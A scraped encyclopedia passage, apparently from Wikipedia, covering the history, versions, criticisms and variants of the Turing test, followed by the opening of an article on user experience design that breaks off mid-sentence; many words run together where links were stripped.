ofmaterialistsat that time. According to dualism, themindisnon-physical(or, at the very least, hasnon-physical properties)[26]and, therefore, cannot be explained in purely physical terms. According to materialism, the mind can be explained physically, which leaves open the possibility of minds that are produced artificially.[27] In 1936, philosopherAlfred Ayerconsidered the standard philosophical question ofother minds: how do we know that other people have the same conscious experiences that we do? In his book,Language, Truth and Logic, Ayer suggested a protocol to distinguish between a conscious man and an unconscious machine: "The only ground I can have for asserting that an object which appears to be conscious is not really a conscious being, but only a dummy or a machine, is that it fails to satisfy one of the empirical tests by which the presence or absence of consciousness is determined".[28](This suggestion is very similar to the Turing test, but it is not certain that Ayer's popular philosophical classic was familiar to Turing.) In other words, a thing is not conscious if it fails the consciousness test. A rudimentary idea of the Turing test appears in the 1726 novelGulliver's TravelsbyJonathan Swift.[29][30]When Gulliver is brought before the king ofBrobdingnag, the king thinks at first that Gulliver might be a "a piece of clock-work (which is in that country arrived to a very great perfection) contrived by some ingenious artist". Even when he hears Gulliver speaking, the king still doubts whether Gulliver was taught "a set of words" to make him "sell at a better price". Gulliver tells that only after "he put several other questions to me, and still received rational answers" the king became satisfied that Gulliver was not a machine.[31] Tests where a human judges whether a computer or an alien is intelligent were an established convention in science fiction by the 1940s, and it is likely that Turing would have been aware of these.[32]Stanley G. Weinbaum's "A Martian Odyssey" (1934) provides an example of how nuanced such tests could be.[32] Earlier examples of machines or automatons attempting to pass as human include theAncient Greekmyth ofPygmalionwho creates a sculpture of a woman that is animated byAphrodite,Carlo Collodi's novelThe Adventures of Pinocchio, about a puppet who wants to become a real boy, andE. T. A. Hoffmann's 1816 story "The Sandman," where the protagonist falls in love with an automaton. In all these examples, people are fooled by artificial beings that - up to a point - pass as human.[33] Researchers in the United Kingdom had been exploring "machine intelligence" for up to ten years prior to the founding of the field of artificial intelligence (AI) research in 1956.[34]It was a common topic among the members of theRatio Club, an informal group of Britishcyberneticsandelectronicsresearchers that included Alan Turing.[35] Turing, in particular, had been running the notion of machine intelligence since at least 1941[36]and one of the earliest-known mentions of "computer intelligence" was made by him in 1947.[37]In Turing's report, "Intelligent Machinery,"[38]he investigated "the question of whether or not it is possible for machinery to show intelligent behaviour"[39]and, as part of that investigation, proposed what may be considered the forerunner to his later tests: It is not difficult to devise a paper machine which will play a not very bad game of chess.[40]Now get three men A, B and C as subjects for the experiment. A and C are to be rather poor chess players, B is the operator who works the paper machine. ... Two rooms are used with some arrangement for communicating moves, and a game is played between C and either A or the paper machine. C may find it quite difficult to tell which he is playing.[41] "Computing Machinery and Intelligence" (1950) was the first published paper by Turing to focus exclusively on machine intelligence. Turing begins the 1950 paper with the claim, "I propose to consider the question 'Can machines think?'"[5]As he highlights, the traditional approach to such a question is to start withdefinitions, defining both the terms "machine" and "think". Turing chooses not to do so; instead, he replaces the question with a new one, "which is closely related to it and is expressed in relatively unambiguous words".[5]In essence he proposes to change the question from "Can machines think?" to "Can machines do what we (as thinking entities) can do?"[42]The advantage of the new question, Turing argues, is that it draws "a fairly sharp line between the physical and intellectual capacities of a man".[43] To demonstrate this approach Turing proposes a test inspired by aparty game, known as the "imitation game", in which a man and a woman go into separate rooms and guests try to tell them apart by writing a series of questions and reading the typewritten answers sent back. In this game, both the man and the woman aim to convince the guests that they are the other. (Huma Shah argues that this two-human version of the game was presented by Turing only to introduce the reader to the machine-human question-answer test.[44]) Turing described his new version of the game as follows: We now ask the question, "What will happen when a machine takes the part of A in this game?" Will the interrogator decide wrongly as often when the game is played like this as he does when the game is played between a man and a woman? These questions replace our original, "Can machines think?"[43] Later in the paper, Turing suggests an "equivalent" alternative formulation involving a judge conversing only with a computer and a man.[45]While neither of these formulations precisely matches the version of the Turing test that is more generally known today, he proposed a third in 1952. In this version, which Turing discussed in aBBCradio broadcast, a jury asks questions of a computer and the role of the computer is to make a significant proportion of the jury believe that it is really a man.[46] Turing's paper considered nine putative objections, which include some of the major arguments againstartificial intelligencethat have been raised in the years since the paper was published (see "Computing Machinery and Intelligence").[6] John Searle's 1980 paperMinds, Brains, and Programsproposed the "Chinese room" thought experiment and argued that the Turing test could not be used to determine if a machine could think. Searle noted that software (such as ELIZA) could pass the Turing test simply by manipulating symbols of which they had no understanding. Without understanding, they could not be described as "thinking" in the same sense people did. Therefore, Searle concluded, the Turing test could not prove that machines could think.[47]Much like the Turing test itself, Searle's argument has been both widely criticised[48]and endorsed.[49] Arguments such as Searle's and others working on thephilosophy of mindsparked off a more intense debate about the nature of intelligence, the possibility of machines with a conscious mind and the value of the Turing test that continued through the 1980s and 1990s.[50] The Loebner Prize, now reported as defunct,[51]provided an annual platform for practical Turing tests with the first competition held in November 1991.[52]It was underwritten byHugh Loebner. The Cambridge Center for Behavioral Studies inMassachusetts, United States, organised the prizes up to and including the 2003 contest. As Loebner described it, one reason the competition was created is to advance the state of AI research, at least in part, because no one had taken steps to implement the Turing test despite 40 years of discussing it.[53] The first Loebner Prize competition in 1991 led to a renewed discussion of the viability of the Turing test and the value of pursuing it, in both the popular press[54]and academia.[55]The first contest was won by a mindless program with no identifiable intelligence that managed to fool naïve interrogators into making the wrong identification. This highlighted several of the shortcomings of the Turing test (discussedbelow): The winner won, at least in part, because it was able to "imitate human typing errors";[54]the unsophisticated interrogators were easily fooled;[55]and some researchers in AI have been led to feel that the test is merely a distraction from more fruitful research.[56] The silver (text only) and gold (audio and visual) prizes have never been won. However, the competition has awarded the bronze medal every year for the computer system that, in the judges' opinions, demonstrates the "most human" conversational behaviour among that year's entries.Artificial Linguistic Internet Computer Entity(A.L.I.C.E.) has won the bronze award on three occasions in recent times (2000, 2001, 2004). Learning AIJabberwackywon in 2005 and 2006. The Loebner Prize tested conversational intelligence; winners were typicallychatterbotprograms, orArtificial Conversational Entities (ACE)s. Early Loebner Prize rules restricted conversations: Each entry and hidden-human conversed on a single topic,[57]thus the interrogators were restricted to one line of questioning per entity interaction. The restricted conversation rule was lifted for the 1995 Loebner Prize. Interaction duration between judge and entity has varied in Loebner Prizes. In Loebner 2003, at the University of Surrey, each interrogator was allowed five minutes to interact with an entity, machine or hidden-human. Between 2004 and 2007, the interaction time allowed in Loebner Prizes was more than twenty minutes. The final competition was in 2019, due to a lack of funding for the prize following Loebner's death in 2016.[58] CAPTCHA(Completely Automated Public Turing test to tell Computers and Humans Apart) is one of the oldest concepts for artificial intelligence. The CAPTCHA system is commonly used online to tell humans and bots apart on the internet. It is based on the Turing test. Displaying distorted letters and numbers, it asks the user to identify the letters and numbers and type them into a field, which bots struggle to do.[18][59] ThereCaptchais a CAPTCHA system owned byGoogle. The reCaptcha v1 and v2 both used to operate by asking the user to match distorted pictures or identify distorted letters and numbers. The reCaptcha v3 is designed to not interrupt users and run automatically when pages are loaded or buttons are clicked. This "invisible" CAPTCHA verification happens in the background and no challenges appear, which filters out most basic bots.[60][61] Saul Traiger argues that there are at least three primary versions of the Turing test, two of which are offered in "Computing Machinery and Intelligence" and one that he describes as the "Standard Interpretation".[62]While there is some debate regarding whether the "Standard Interpretation" is that described by Turing or, instead, based on a misreading of his paper, these three versions are not regarded as equivalent,[62]and their strengths and weaknesses are distinct.[63] Turing's original article describes a simple party game involving three players. Player A is a man, player B is a woman and player C (who plays the role of the interrogator) is of either gender. In the imitation game, player C is unable to see either player A or player B, and can communicate with them only through written notes. By asking questions of player A and player B, player C tries to determine which of the two is the man and which is the woman. Player A's role is to trick the interrogator into making the wrong decision, while player B attempts to assist the interrogator in making the right one.[7] Turing then asks: "What will happen when a machine takes the part of A in this game? Will the interrogator decide wrongly as often when the game is played like this as he does when the game is played between a man and a woman?" These questions replace our original, "Can machines think?"[43] The second version appeared later in Turing's 1950 paper. Similar to the original imitation game test, the role of player A is performed by a computer. However, the role of player B is performed by a man rather than a woman. Let us fix our attention on one particular digital computerC.Is it true that by modifying this computer to have an adequate storage, suitably increasing its speed of action, and providing it with an appropriate programme,Ccan be made to play satisfactorily the part of A in the imitation game, the part of B being taken by a man?[43] In this version, both player A (the computer) and player B are trying to trick the interrogator into making an incorrect decision. The standard interpretation is not included in the original paper, but is both accepted and debated. Common understanding has it that the purpose of the Turing test is not specifically to determine whether a computer is able to fool an interrogator into believing that it is a human, but rather whether a computer couldimitatea human.[7]While there is some dispute whether this interpretation was intended by Turing, Sterrett believes that it was[64]and thus conflates the second version with this one, while others, such as Traiger, do not[62]– this has nevertheless led to what can be viewed as the "standard interpretation". In this version, player A is a computer and player B a person of either sex. The role of the interrogator is not to determine which is male and which is female, but which is a computer and which is a human.[65]The fundamental issue with the standard interpretation is that the interrogator cannot differentiate which responder is human, and which is machine. There are issues about duration, but the standard interpretation generally considers this limitation as something that should be reasonable. Controversy has arisen over which of the alternative formulations of the test Turing intended.[64]Sterrett argues that two distinct tests can be extracted from his 1950 paper and that,paceTuring's remark, they are not equivalent. The test that employs the party game and compares frequencies of success is referred to as the "Original Imitation Game Test", whereas the test consisting of a human judge conversing with a human and a machine is referred to as the "Standard Turing Test", noting that Sterrett equates this with the "standard interpretation" rather than the second version of the imitation game. Sterrett agrees that the standard Turing test (STT) has the problems that its critics cite but feels that, in contrast, the original imitation game test (OIG test) so defined is immune to many of them, due to a crucial difference: Unlike the STT, it does not make similarity to human performance the criterion, even though it employs human performance in setting a criterion for machine intelligence. A man can fail the OIG test, but it is argued that it is a virtue of a test of intelligence that failure indicates a lack of resourcefulness: The OIG test requires the resourcefulness associated with intelligence and not merely "simulation of human conversational behaviour". The general structure of the OIG test could even be used with non-verbal versions of imitation games.[66] According to Huma Shah, Turing himself was concerned with whether a machine could think and was providing a simple method to examine this: through human-machine question-answer sessions.[67]Shah argues the imitation game which Turing described could be practicalized in two different ways: a) one-to-one interrogator-machine test, and b) simultaneous comparison of a machine with a human, both questioned in parallel by an interrogator.[44] Still other writers[68]have interpreted Turing as proposing that the imitation game itself is the test, without specifying how to take into account Turing's statement that the test that he proposed using the party version of the imitation game is based upon a criterion of comparative frequency of success in that imitation game, rather than a capacity to succeed at one round of the game. Some writers argue that the imitation game is best understood by its social aspects. In his 1948 paper, Turing refers to intelligence as an "emotional concept," and notes that The extent to which we regard something as behaving in an intelligent manner is determined as much by our own state of mind and training as by the properties of the object under consideration. If we are able to explain and predict its behaviour or if there seems to be little underlying plan, we have little temptation to imagine intelligence. With the same object therefore it is possible that one man would consider it as intelligent and another would not; the second man would have found out the rules of its behaviour.[69] Following this remark and similar ones scattered throughout Turing's publications, Diane Proudfoot[70]claims that Turing held aresponse-dependenceapproach to intelligence, according to which an intelligent (or thinking) entity is one thatappearsintelligent to an average interrogator. Shlomo Danziger[71]promotes a socio-technological interpretation, according to which Turing saw the imitation game not as an intelligence test but as a technological aspiration - one whose realization would likely involve a change in society's attitude toward machines. According to this reading, Turing's celebrated 50-year prediction - that by the end of the 20th century his test will be passed by some machine - actually consists of two distinguishable predictions. The first is a technological prediction: I believe that in about fifty years' time it will be possible to programme computers ... to make them play the imitation game so well that an average interrogator will not have more than 70% chance of making the right identification after five minutes of questioning.[72] The second prediction Turing makes is a sociological one: I believe that at the end of the century the use of words and general educated opinion will have altered so much that one will be able to speak of machines thinking without expecting to be contradicted.[72] Danziger claims further that for Turing, alteration of society's attitude towards machinery is a prerequisite for the existence of intelligent machines: Only when the term "intelligent machine" is no longer seen as an oxymoron the existence of intelligent machines would becomelogicallypossible. Saygin has suggested that maybe the original game is a way of proposing a less biased experimental design as it hides the participation of the computer.[73]The imitation game also includes a "social hack" not found in the standard interpretation, as in the game both computer and male human are required to play as pretending to be someone they are not.[74] A crucial piece of any laboratory test is that there should be a control. Turing never makes clear whether the interrogator in his tests is aware that one of the participants is a computer. He states only that player A is to be replaced with a machine, not that player C is to be made aware of this replacement.[43]When Colby, FD Hilf, S Weber and AD Kramer tested PARRY, they did so by assuming that the interrogators did not need to know that one or more of those being interviewed was a computer during the interrogation.[75]As Ayse Saygin, Peter Swirski,[76]and others have highlighted, this makes a big difference to the implementation and outcome of the test.[7]An experimental study looking atGricean maxim violationsusing transcripts of Loebner's one-to-one (interrogator-hidden interlocutor) Prize for AI contests between 1994 and 1999, Ayse Saygin found significant differences between the responses of participants who knew and did not know about computers being involved.[77] The power and appeal of the Turing test derives from its simplicity. Thephilosophy of mind,psychology, and modernneurosciencehave been unable to provide definitions of "intelligence" and "thinking" that are sufficiently precise and general to be applied to machines. Without such definitions, the central questions of thephilosophy of artificial intelligencecannot be answered. The Turing test, even if imperfect, at least provides something that can actually be measured. As such, it is a pragmatic attempt to answer a difficult philosophical question. The format of the test allows the interrogator to give the machine a wide variety of intellectual tasks. Turing wrote that "the question and answer method seems to be suitable for introducing almost any one of the fields of human endeavour that we wish to include".[78]John Haugelandadds that "understanding the words is not enough; you have to understand thetopicas well".[79] To pass a well-designed Turing test, the machine must usenatural language,reason, haveknowledgeandlearn. The test can be extended to include video input, as well as a "hatch" through which objects can be passed: this would force the machine to demonstrate skilled use of well designedvisionandroboticsas well. Together, these represent almost all of the major problems that artificial intelligence research would like to solve.[80] TheFeigenbaum testis designed to take advantage of the broad range of topics available to a Turing test. It is a limited form of Turing's question-answer game which compares the machine against the abilities of experts in specific fields such as literature orchemistry. As a Cambridge honours graduate in mathematics, Turing might have been expected to propose a test of computer intelligence requiring expert knowledge in some highly technical field, and thus anticipatinga more recent approach to the subject. Instead, as already noted, the test which he described in his seminal 1950 paper requires the computer to be able to compete successfully in a common party game, and this by performing as well as the typical man in answering a series of questions so as to pretend convincingly to be the woman contestant. Given the status of human sexual dimorphism asone of the most ancient of subjects, it is thus implicit in the above scenario that the questions to be answered will involve neither specialised factual knowledge nor information processing technique. The challenge for the computer, rather, will be to demonstrate empathy for the role of the female, and to demonstrate as well a characteristic aesthetic sensibility—both of which qualities are on display in this snippet of dialogue which Turing has imagined: When Turing does introduce some specialised knowledge into one of his imagined dialogues, the subject is not maths or electronics, but poetry: Turing thus once again demonstrates his interest in empathy and aesthetic sensitivity as components of an artificial intelligence; and in light of an increasing awareness of the threat from an AI run amok,[81]it has been suggested[82]that this focus perhaps represents a critical intuition on Turing's part, i.e., that emotional and aesthetic intelligence will play a key role in the creation of a "friendly AI". It is further noted, however, that whatever inspiration Turing might be able to lend in this direction depends upon the preservation of his original vision, which is to say, further, that the promulgation of a "standard interpretation" of the Turing test—i.e., one which focuses on a discursive intelligence only—must be regarded with some caution. Turing did not explicitly state that the Turing test could be used as a measure of "intelligence", or any other human quality. He wanted to provide a clear and understandable alternative to the word "think", which he could then use to reply to criticisms of the possibility of "thinking machines" and to suggest ways that research might move forward. Nevertheless, the Turing test has been proposed as a measure of a machine's "ability to think" or its "intelligence". This proposal has received criticism from both philosophers and computer scientists. The interpretation makes the assumption that an interrogator can determine if a machine is "thinking" by comparing its behaviour with human behaviour. Every element of this assumption has been questioned: the reliability of the interrogator's judgement, the value of comparing the machine with a human, and the value of comparing only behaviour. Because of these and other considerations, some AI researchers have questioned the relevance of the test to their field. In practice, the test's results can easily be dominated not by the computer's intelligence, but by the attitudes, skill, or naïveté of the questioner. Numerous experts in the field, including cognitive scientistGary Marcus, insist that the Turing test only shows how easy it is to fool humans and is not an indication of machine intelligence.[83] Turing doesn't specify the precise skills and knowledge required by the interrogator in his description of the test, but he did use the term "average interrogator": "[the] average interrogator would not have more than 70 per cent chance of making the right identification after five minutes of questioning".[72] Chatterbot programs such as ELIZA have repeatedly fooled unsuspecting people into believing that they are communicating with human beings. In these cases, the "interrogators" are not even aware of the possibility that they are interacting with computers. To successfully appear human, there is no need for the machine to have any intelligence whatsoever and only a superficial resemblance to human behaviour is required. Early Loebner Prize competitions used "unsophisticated" interrogators who were easily fooled by the machines.[55]Since 2004, the Loebner Prize organisers have deployed philosophers, computer scientists, and journalists among the interrogators. Nonetheless, some of these experts have been deceived by the machines.[84] One interesting feature of the Turing test is the frequency of theconfederate effect, when the confederate (tested) humans are misidentified by the interrogators as machines. It has been suggested that what interrogators expect as human responses is not necessarily typical of humans. As a result, some individuals can be categorised as machines. This can therefore work in favour of a competing machine. The humans are instructed to "act themselves", but sometimes their answers are more like what the interrogator expects a machine to say.[85]This raises the question of how to ensure that the humans are motivated to "act human". The Turing test does not directly test whether the computer behaves intelligently. It tests only whether the computer behaves like a human being. Since human behaviour and intelligent behaviour are not exactly the same thing, the test can fail to accurately measure intelligence in two ways: The Turing test is concerned strictly with how the subjectacts– the external behaviour of the machine. In this regard, it takes abehaviouristorfunctionalistapproach to the study of the mind. The example ofELIZAsuggests that a machine passing the test may be able to simulate human conversational behaviour by following a simple (but large) list of mechanical rules, without thinking or having a mind at all. John Searlehas argued that external behaviour cannot be used to determine if a machine is "actually" thinking or merely "simulating thinking".[47]HisChinese roomargument is intended to show that, even if the Turing test is a good operational definition of intelligence, it may not indicate that the machine has amind,consciousness, orintentionality. (Intentionality is a philosophical term for the power of thoughts to be "about" something.) Turing anticipated this line of criticism in his original paper,[89]writing: I do not wish to give the impression that I think there is no mystery about consciousness. There is, for instance, something of a paradox connected with any attempt to localise it. But I do not think these mysteries necessarily need to be solved before we can answer the question with which we are concerned in this paper.[90] Mainstream AI researchers argue that trying to pass the Turing test is merely a distraction from more fruitful research.[56]Indeed, the Turing test is not an active focus of much academic or commercial effort—asStuart RussellandPeter Norvigwrite: "AI researchers have devoted little attention to passing the Turing test".[91]There are several reasons. First, there are easier ways to test their programs. Most current research in AI-related fields is aimed at modest and specific goals, such asobject recognitionorlogistics. To test the intelligence of the programs that solve these problems, AI researchers simply give them the task directly. Stuart Russell and Peter Norvig suggest an analogy with thehistory of flight: Planes are tested by how well they fly, not by comparing them to birds. "Aeronautical engineeringtexts," they write, "do not define the goal of their field as 'making machines that fly so exactly likepigeonsthat they can fool other pigeons.'"[91] Second, creating lifelike simulations of human beings is a difficult problem on its own that does not need to be solved to achieve the basic goals of AI research. Believable human characters may be interesting in a work of art, agame, or a sophisticateduser interface, but they are not part of the science of creating intelligent machines, that is, machines that solve problems using intelligence. Turing did not intend for his idea to be used to test the intelligence of programs—he wanted to provide a clear and understandable example to aid in the discussion of thephilosophy of artificial intelligence.[92]John McCarthyargues that we should not be surprised that a philosophical idea turns out to be useless for practical applications. He observes that the philosophy of AI is "unlikely to have any more effect on the practice of AI research than philosophy of science generally has on the practice of science".[93][94] Another well known objection raised towards the Turing test concerns its exclusive focus on linguistic behaviour (i.e. it is only a "language-based" experiment, while all the other cognitive faculties are not tested). This drawback downsizes the role of other modality-specific "intelligent abilities" concerning human beings that the psychologist Howard Gardner, in his "multiple intelligence theory", proposes to consider (verbal-linguistic abilities are only one of those).[95] A critical aspect of the Turing test is that a machine must give itself away as being a machine by its utterances. An interrogator must then make the "right identification" by correctly identifying the machine as being just that. If, however, a machine remains silent during a conversation, then it is not possible for an interrogator to accurately identify the machine other than by means of a calculated guess.[96]Even taking into account a parallel/hidden human as part of the test may not help the situation as humans can often be misidentified as being a machine.[97] By focusing onimitatinghumans, rather than augmenting or extending human capabilities, the Turing Test risks directing research and implementation toward technologies that substitute for humans and thereby drive down wages and income for workers. As they lose economic power, these workers may also lose political power, making it more difficult for them to change the allocation of wealth and income. This can trap them in a bad equilibrium. Erik Brynjolfsson has called this "The Turing Trap"[98]and argued that there are currently excess incentives for creating machines that imitate rather than augment humans. Numerous other versions of the Turing test, including those expounded above, have been raised through the years. A modification of the Turing test wherein the objective of one or more of the roles have been reversed between machines and humans is termed a reverse Turing test. An example is implied in the work of psychoanalystWilfred Bion,[99]who was particularly fascinated by the "storm" that resulted from the encounter of one mind by another. In his 2000 book,[76]among several other original points with regard to the Turing test, literary scholarPeter Swirskidiscussed in detail the idea of what he termed the Swirski test—essentially the reverse Turing test. He pointed out that it overcomes most if not all standard objections levelled at the standard version. Carrying this idea forward,R. D. Hinshelwood[100]described the mind as a "mind recognizing apparatus". The challenge would be for the computer to be able to determine if it were interacting with a human or another computer. This is an extension of the original question that Turing attempted to answer but would, perhaps, offer a high enough standard to define a machine that could "think" in a way that we typically define as characteristically human. CAPTCHAis a form of reverse Turing test. Before being allowed to perform some action on a website, the user is presented with alphanumerical characters in a distorted graphic image and asked to type them out. This is intended to prevent automated systems from being used to abuse the site. The rationale is that software sufficiently sophisticated to read and reproduce the distorted image accurately does not exist (or is not available to the average user), so any system able to do so is likely to be a human. Software that could reverse CAPTCHA with some accuracy by analysing patterns in the generating engine started being developed soon after the creation of CAPTCHA.[101]In 2013, researchers atVicariousannounced that they had developed a system to solve CAPTCHA challenges fromGoogle,Yahoo!, andPayPalup to 90% of the time.[102]In 2014, Google engineers demonstrated a system that could defeat CAPTCHA challenges with 99.8% accuracy.[103]In 2015,Shuman Ghosemajumder, formerclick fraudczar of Google, stated that there werecybercriminalsites that would defeat CAPTCHA challenges for a fee, to enable various forms of fraud.[104] A further variation is motivated by the concern that modern Natural Language Processing prove to be highly successful in generating text on the basis of a huge text corpus and could eventually pass the Turing test simply by manipulating words and sentences that have been used in the initial training of the model. Since the interrogator has no precise understanding of the training data, the model might simply be returning sentences that exist in similar fashion in the enormous amount of training data. For this reason,Arthur Schwaningerproposes a variation of the Turing test that can distinguish between systems that are only capable ofusinglanguage and systems thatunderstandlanguage. He proposes a test in which the machine is confronted with philosophical questions that do not depend on any prior knowledge and yet require self-reflection to be answered appropriately.[105] Another variation is described as thesubject-matter expertTuring test, where a machine's response cannot be distinguished from an expert in a given field. This is also known as a "Feigenbaum test" and was proposed byEdward Feigenbaumin a 2003 paper.[106] Robert French(1990) makes the case that an interrogator can distinguish human and non-human interlocutors by posing questions that reveal the low-level (i.e., unconscious) processes of human cognition, as studied bycognitive science. Such questions reveal the precise details of the human embodiment of thought and can unmask a computer unless it experiences the world as humans do.[107] The "Total Turing test"[3]variation of the Turing test, proposed by cognitive scientistStevan Harnad,[108]adds two further requirements to the traditional Turing test. The interrogator can also test the perceptual abilities of the subject (requiringcomputer vision) and the subject's ability to manipulate objects (requiringrobotics).[109] A letter published inCommunications of the ACM[110]describes the concept of generating a synthetic patient population and proposes a variation of Turing test to assess the difference between synthetic and real patients. The letter states: "In the EHR context, though a human physician can readily distinguish between synthetically generated and real live human patients, could a machine be given the intelligence to make such a determination on its own?" and further the letter states: "Before synthetic patient identities become a public health problem, the legitimate EHR market might benefit from applying Turing Test-like techniques to ensure greater data reliability and diagnostic value. Any new techniques must thus consider patients' heterogeneity and are likely to have greater complexity than the Allen eighth-grade-science-test is able to grade". The minimum intelligent signal test was proposed byChris McKinstryas "the maximum abstraction of the Turing test",[111]in which only binary responses (true/false or yes/no) are permitted, to focus only on the capacity for thought. It eliminates text chat problems likeanthropomorphism bias, and does not require emulation ofunintelligent human behaviour, allowing for systems that exceed human intelligence. The questions must each stand on their own, however, making it more like anIQ testthan an interrogation. It is typically used to gather statistical data against which the performance of artificial intelligence programs may be measured.[112] The organisers of theHutter Prizebelieve that compressing natural language text is a hard AI problem, equivalent to passing the Turing test. The data compression test has some advantages over most versions and variations of a Turing test, including:[citation needed] The main disadvantages of using data compression as a test are: A related approach to Hutter's prize which appeared much earlier in the late 1990s is the inclusion of compression problems in an extended Turing test.[113]or by tests which are completely derived fromKolmogorov complexity.[114]Other related tests in this line are presented by Hernandez-Orallo and Dowe.[115] Algorithmic IQ, or AIQ for short, is an attempt to convert the theoretical Universal Intelligence Measure from Legg and Hutter (based onSolomonoff's inductive inference) into a working practical test of machine intelligence.[116] Two major advantages of some of these tests are their applicability to nonhuman intelligences and their absence of a requirement for human testers. The Turing test inspired theEbert testproposed in 2011 by film criticRoger Ebertwhich is a test whether a computer-basedsynthesised voicehas sufficient skill in terms of intonations, inflections, timing and so forth, to make people laugh.[117] Taking advantage oflarge language models, in 2023 the research companyAI21 Labscreated an online social experiment titled "Human or Not?"[118][119]It was played more than 10 million times by more than 2 million people.[120]It is the biggest Turing-style experiment to that date. The results showed that 32% of people could not distinguish between humans and machines.[121][122] 1990 marked the fortieth anniversary of the first publication of Turing's "Computing Machinery and Intelligence" paper, and saw renewed interest in the test. Two significant events occurred in that year: the first was the Turing Colloquium, which was held at theUniversity of Sussexin April, and brought together academics and researchers from a wide variety of disciplines to discuss the Turing test in terms of its past, present, and future; the second was the formation of the annualLoebner Prizecompetition. Blay Whitbylists four major turning points in the history of the Turing test – the publication of "Computing Machinery and Intelligence" in 1950, the announcement ofJoseph Weizenbaum'sELIZAin 1966,Kenneth Colby's creation ofPARRY, which was first described in 1972, and the Turing Colloquium in 1990.[123] In parallel to the 2008Loebner Prizeheld at theUniversity of Reading,[124]theSociety for the Study of Artificial Intelligence and the Simulation of Behaviour(AISB), hosted a one-day symposium to discuss the Turing test, organised byJohn Barnden,Mark Bishop,Huma ShahandKevin Warwick.[125]The speakers included the Royal Institution's DirectorBaroness Susan Greenfield,Selmer Bringsjord, Turing's biographerAndrew Hodges, and consciousness scientistOwen Holland. No agreement emerged for a canonical Turing test, though Bringsjord expressed that a sizeable prize would result in the Turing test being passed sooner.
https://en.wikipedia.org/wiki/Turing_test
User experience design(UX design,UXD,UED, orXD), upon which is the centralized requirements for "User Experience Design Research" (also known as UX Design Research), defines the experience a user would go through when interacting with a company, its services, and its products.[1]User experiencedesign is auser centered designapproach because it considers the user's experience when using a product or platform.[2]Research, data analysis, and test results drive design decisions in UX design rather than aesthetic preferences and opinions, for which is known as UX Design Research. Unlikeuser interface design, which focuses solely on the design of a computer interface, UX design encompasses all aspects of a user's perceived experience with a product or website, such as itsusability, usefulness,desirability,brandperception, and overall performance. UX design is also an element of thecustomer experience(CX), and encompasses all design aspects and design stages that are around a customer's experience.[3] User experience design is aconceptual designdiscipline rooted inhuman factors and ergonomics. This field, since the late 1940s, has focused on the interaction between human users, machines, and contextual environments to design systems that address the user's experience.[4]User experiencebecame a positive insight for designers in the early 1990s with the proliferation of workplace computers.Don Norman, a professor and researcher in design, usability, and cognitive science, coined the term "user experience", and brought it to a wider audience that is inside our modernized society.[5] I invented the term because I thought human interface and usability were too narrow. I wanted to cover all aspects of the person's experience with the system including industrial design graphics, the interface, the physical interaction and the manual. Since then the term has spread widely, so much so that it is starting to lose its meaning. User experience design draws from design approaches likehuman-computer interactionanduser-centered design, and includes elements from similar disciplines likeinteraction design,visual design,information architecture,user research, and others. Another portion of the research is understanding the end-user and the purpose of the application. Though this might seem clear to the designer, stepping back and empathizing with the user will yield the best results. It helps to identify and prove or disprove assumptions, find commonalities across target audience members, and recognize their needs, goals, and mental models. Visual design, also commonly known asgraphic design,user interface design,communication design, andvisual communication, represents the aesthetics orlook-and-feelof the front end of anyuser interface. Graphic treatment of interface elements is often perceived as the visual design. The purpose of visual design is to use visual elements like colors, images, and symbols to convey a message to its audience. Fundamentals ofGestalt psychologyandvisual perceptiongive a cognitive perspective on how to create effective visual communication.[7] Information architecture is the art and science of structuring and organizing the information in products and services to supportusabilityandfindability.[8] In the context of information architecture, information is separate from both knowledge and data, and lies nebulously between them. It is information about objects.[9]The objects can range from websites, to software applications, to images et al. It is also concerned withmetadata: terms used to describe and represent content objects such as documents, people, process, and organizations. Information architecture also encompasses how the pages and navigation are structured.[10] It is well recognized that the component of interaction design is an essential part ofuser experience(UX) design, centering on the interaction between users and products.[11]The goal of interaction design is to create a product that produces an efficient and delightful end-user experience by enabling users to achieve their objectives in the best way possible[12][13] The growing emphasis on user-centered design and the strong focus on enhancing user experience have made interaction designers essential in shaping products that align with user expectations and adhere to the latest UI patterns and components.[14] In the last few years, the role of interaction designer has shifted from being just focused on specifying UI components and communicating them to the engineers to a situation in which designers have more freedom to design contextual interfaces based on helping meet the user's needs.[15]Therefore, User Experience Design evolved into a multidisciplinary design branch that involves multiple technical aspects frommotion graphics designandanimationtoprogramming. Usability is the extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency and satisfaction in a specified context of use.[16] Usability is attached to all tools used by humans and is extended to both digital and non-digital devices. Thus, it is a subset of user experience but not wholly contained. The section of usability that intersects with user experience design is related to humans' ability to use a system or application. Good usability is essential to positive user experience but does not alone guarantee it.[17] Accessibility of a system describes its ease of reach, use, and understanding. In terms of user experience design, it can also be related to the overall comprehensibility of the information and features. It helps shorten the learning curve associated with the system. Accessibility in many contexts can be related to the ease of use for people with disabilities and comes under usability.[18]In addition, accessible design is the concept of services, products, or facilities in which designers should accommodate and consider for the needs of people with disabilities. The Web Content Accessibility Guidelines (WCAG) state that all content must adhere to the four main principles of POUR: Perceivable, Operable, Understandable, and Robust.[19] Web Content Accessibility Guidelines (WCAG) 2.0 covers a wide range of recommendations for making Web content more accessible. This makes web content more usable to users in general.[20]Making content more usable and readily accessible to all types of users enhances a user's overall user experience. Human–computer interaction is concerned with the design, evaluation and implementation of interactive computing systems for human use and with the study of major phenomena surrounding them.[21] After research, the designer uses the modeling of the users and their environments. User modeling orpersonasare composite archetypes based on behavior patterns uncovered during research. Personas provide designers a precise way of thinking and communicating about how groups of users behave, how they think, what they want to accomplish and why.[22]Once created, personas help the designer to understand the users' goals in specific contexts, which is particularly useful duringideationand for validating design concepts. Other types of models include workflow models, artifact models, and physical models. When the designer has a solid understanding of the user's needs and goals, they begin to sketch out the interaction framework (also known aswireframes). This stage defines the high-level structure of screen layouts, as well as the product's flow, behavior, and organization. There are many kinds of materials that can be involved during this iterative phase, from whiteboards to paper prototypes. As the interaction framework establishes an overall structure for product behavior, a parallel process focused on the visual and industrial designs. The visual design framework defines the experience attributes, visual language, and the visual style.[23] Once a solid and stable framework is established, wireframes are translated from sketched storyboards to full-resolution screens that depict the user interface at the pixel level. At this point, it is critical for the programming team to collaborate closely with the designer. Their input is necessary to create a finished design that can and will be built while remaining true to the concept.[citation needed] Usability testingis carried out by giving users various tasks to perform on the prototypes. Any issues or problems faced by the users are collected as field notes and these notes are used to make changes in the design and reiterate the testing phase.[24]Aside from monitoring issues, questions asked by users are also noted in order to identify potential points of confusion. Usability testing is, at its core, a means to "evaluate, not create".[25] UX designers perform a number of different tasks and, therefore, 